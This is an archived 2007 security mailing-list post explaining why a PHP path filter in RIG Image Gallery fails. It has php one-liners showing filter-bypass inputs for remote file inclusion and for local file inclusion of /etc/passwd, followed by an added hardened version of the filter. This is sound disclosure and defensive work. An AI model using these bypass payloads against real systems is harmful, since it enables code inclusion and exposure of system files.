[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability

ascii ascii at katamail.com
Tue Jul 31 15:09:41 UTC 2007


George A. Theall wrote:
> But regardless, the str_replace() later on in rig_check_src_file()
> would certainly void the possibility of a remote file include attack.

I'm not saying that the product is vulnerable, but that this statement
is completely flawed: rig_check_src_file() is mostly useless (assumption
taken from George's code snippet; I haven't downloaded the original
script).

function rig_check_src_file($name) {
  ...
          $name = str_replace("..", ".", str_replace("://", "", $name));
  ...
          return $name;
}

This alone permits both local and remote file inclusions:

Example a) Remote file inclusion

php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".",
str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
http://www.tin.it/

Warning: require_once(): URL file-access is disabled in the server
configuration in Command line code on line 1

Warning: require_once(http://www.tin.it/): failed to open stream: no
suitable wrapper could be found in Command line code on line 1

Fatal error: require_once(): Failed opening required
'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php')
in Command line code on line 1

Example b) Local file inclusion

php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".",
str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
../../../etc/passwd

Warning: require_once(../../../etc/passwd): failed to open stream: No
such file or directory in Command line code on line 1

Fatal error: require_once(): Failed opening required
'../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php')
in Command line code on line 1

Best regards,
Francesco `ascii` Ongaro
http://www.ush.it/
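As an added illustration for this thread (not code from the post or from RIG Image Gallery), the quoted single-pass filter is shown next to a hardened replacement that allow-lists the path and confines it to an assumed image directory ($base_dir); the two inputs from the post pass the first and are rejected by the second.

```php
<?php
// Flawed filter as quoted in the thread: one non-recursive pass, so
// "..." collapses to ".." and "http:/:///" collapses to "http://".
function rig_check_src_file_flawed($name) {
    return str_replace("..", ".", str_replace("://", "", $name));
}

// Hardened variant (assumption: callers only need a relative path of
// plain characters under $base_dir, never a scheme or parent reference).
function rig_check_src_file_hardened($name, $base_dir) {
    // Allow-list the characters and reject any parent-directory token
    // outright instead of trying to strip it.
    if (!preg_match('#^[A-Za-z0-9_./-]+$#', $name) ||
        strpos($name, '..') !== false) {
        return false;
    }
    // Resolve both paths on disk; realpath() returns false when the
    // file does not exist, which is also a rejection here.
    $base = realpath($base_dir);
    $full = realpath($base_dir . '/' . $name);
    if ($base === false || $full === false) {
        return false;
    }
    // The resolved file must still sit strictly inside $base_dir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $full;
}

// Constructed inputs taken from the two examples in the post.
$inputs = array("http:/:///www.tin.it/", ".../.../.../etc/passwd");
$base_dir = __DIR__; // assumption: the gallery's image directory
foreach ($inputs as $in) {
    $flawed   = rig_check_src_file_flawed($in);
    $hardened = rig_check_src_file_hardened($in, $base_dir);
    printf("%-26s flawed=> %-22s hardened=> %s\n",
        $in, $flawed, $hardened === false ? "rejected" : $hardened);
}
```

Both inputs print "rejected" for the hardened filter; the flawed column shows the same "http://www.tin.it/" and "../../../etc/passwd" strings the post demonstrates.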
